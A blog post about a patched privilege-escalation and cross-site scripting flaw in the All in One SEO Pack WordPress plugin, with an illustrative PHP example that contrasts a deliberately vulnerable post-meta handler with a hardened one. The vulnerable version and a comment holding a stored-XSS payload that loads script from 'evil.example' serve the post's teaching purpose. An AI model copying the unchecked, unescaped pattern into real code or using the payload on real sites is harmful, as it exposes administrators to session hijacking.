WordPress blog owners who use the “All in One SEO Pack” plugin for search engine optimization need to be aware of this. Sucuri, a popular security blog, released a post disclosing a vulnerability in the plugin.
Security Flaws present in All in One SEO Pack plugin
The flaw in the plugin code allows attackers to:
- escalate their privileges on the blog;
- carry out cross-site scripting (XSS) attacks against WordPress blogs.
Plugin users need not panic, though: the developer of All in One SEO Pack has addressed the issue and released an update. Anyone running a version older than 2.1.6 is advised to update as soon as possible.
The change log of “All in One SEO Pack” for version 2.1.6 reads:
- Google Settings – Improved Google Analytics code for tracking outbound links
- Google Settings – New option for Anonymize IP addresses for Google Analytics
- XML Sitemap Module – New controls for setting the frequency and priority of individual post types
- XML Sitemap Module – New controls for setting the frequency and priority of individual taxonomies
- XML Sitemap Module – Additional integration with SimplePress
- Social Meta Module – New option for setting the Twitter Card Type
- Added integration with the Advanced Custom Fields plugin so that you can use ACF fields in titles and descriptions
- Live preview snippet on the Edit Post screen now displays the Site Title
- Security patch for vulnerabilities which might trigger privilege escalation and cross site scripting issues on WordPress administration panel reported by Sucuri (props to Marc at Sucuri)
- Bug fixes for issues reported by users in the support forums
The “Security patch” entry in the change log clearly acknowledges the issue. Despite the flaw, All in One SEO Pack remains among the top WordPress SEO plugins, so there is no reason to abandon it, only to update it.
Here is an explanation of the two issues, privilege escalation and cross-site scripting.
Privilege Escalation
In privilege escalation, a bug in an application is exploited to gain access beyond what the user was granted. For example, a normal user of an application gains administrative privileges, or gains the ability to change data that only administrators should be able to change.
As reported by Sucuri, the bug in the All in One SEO Pack code allows exactly this kind of elevation. A logged-in user without administrative privileges could add or modify some of the parameters the plugin manages, namely the SEO title, keywords and tags of posts. An attacker holding nothing more than a low-privileged account could therefore lower the blog’s ranking on search engines by tampering with those post titles, keywords and tags.
Cross Site Scripting (XSS) Attacks
In this attack, the attacker injects a client-side script into a web page that other users view. When the script runs in a victim’s browser it executes with that victim’s session, which lets the attacker bypass the site’s access controls, for example by performing actions as a logged-in administrator. The change log entry above notes that the affected pages in this case were in the WordPress administration panel, which is exactly where an administrator would be the victim.
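As an added illustration (this is not All in One SEO Pack’s own code, which neither this post nor the quoted change log shows), here is the general shape of the weakness behind the two issues described above, written as a WordPress handler that stores SEO fields as post meta from the Edit Post screen: first without checks, then hardened. The seo_demo_* function, field and meta-key names are assumptions made for this example, and the link between the two issues (a low-privileged user stores an SEO field that an administrator’s browser later renders unescaped) is the assumed mechanism, not a detail taken from the Sucuri report.

```php
<?php
/*
 * Added example, not All in One SEO Pack code. Two versions of a handler
 * that stores SEO fields as post meta when a post is saved.
 * All seo_demo_* names are assumptions made for this illustration.
 */

/* ---------- Vulnerable pattern ---------- */

// Nothing here confirms that the current user may edit THIS post, that the
// request came from our own form (nonce), or that the value is safe to store.
// Any code path that reaches the hook with attacker-controlled $_POST
// (the assumed weak spot) writes the SEO fields: privilege escalation.
function seo_demo_save_vulnerable( $post_id ) {
    foreach ( array( 'seo_demo_title', 'seo_demo_keywords' ) as $field ) {
        if ( isset( $_POST[ $field ] ) ) {
            update_post_meta( $post_id, '_' . $field, $_POST[ $field ] );
        }
    }
}

// The stored value is echoed back into the admin page without escaping, so a
// title such as  "><script src=//evil.example/x.js></script>  runs in the
// browser of every administrator who opens the post: stored XSS.
function seo_demo_render_vulnerable( $post_id ) {
    $title = get_post_meta( $post_id, '_seo_demo_title', true );
    echo '<input type="text" name="seo_demo_title" value="' . $title . '">';
}

/* ---------- Hardened pattern ---------- */

function seo_demo_save_hardened( $post_id ) {
    // Skip autosaves and revisions; they are not submissions of our form.
    if ( wp_is_post_autosave( $post_id ) || wp_is_post_revision( $post_id ) ) {
        return;
    }
    // CSRF protection: the request must carry the nonce our form emitted.
    if ( ! isset( $_POST['seo_demo_nonce'] )
        || ! wp_verify_nonce( $_POST['seo_demo_nonce'], 'seo_demo_save_' . $post_id ) ) {
        return;
    }
    // Authorization: the capability check is per post, so a subscriber, or a
    // contributor touching someone else's post, is refused right here.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    foreach ( array( 'seo_demo_title', 'seo_demo_keywords' ) as $field ) {
        if ( isset( $_POST[ $field ] ) ) {
            // WordPress adds slashes to $_POST; strip them, then sanitize
            // (sanitize_text_field drops tags and control characters).
            $value = sanitize_text_field( wp_unslash( $_POST[ $field ] ) );
            update_post_meta( $post_id, '_' . $field, $value );
        }
    }
}

// Escape on output as well: input sanitization can be bypassed by other code
// paths (imports, direct database edits), so never trust stored meta in HTML.
function seo_demo_render_hardened( $post_id ) {
    $title = get_post_meta( $post_id, '_seo_demo_title', true );
    wp_nonce_field( 'seo_demo_save_' . $post_id, 'seo_demo_nonce' );
    echo '<input type="text" name="seo_demo_title" value="' . esc_attr( $title ) . '">';
}

add_action( 'save_post', 'seo_demo_save_hardened' );
```

The three checks in the hardened save handler each close a different door: the nonce ties the write to a form the same user rendered, current_user_can( 'edit_post', $post_id ) is the per-post authorization that stops a low-privileged account from changing another post’s SEO fields, and esc_attr() on output neutralises anything that still reached the database, which is the defence that matters against the administration-panel XSS.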
WordPress users should always keep an eye on security flaws and plugin vulnerabilities. Technoxpad recommends keeping WordPress blogs fully updated, and that includes themes, plugins and WordPress itself.
Tags: wordpress plugins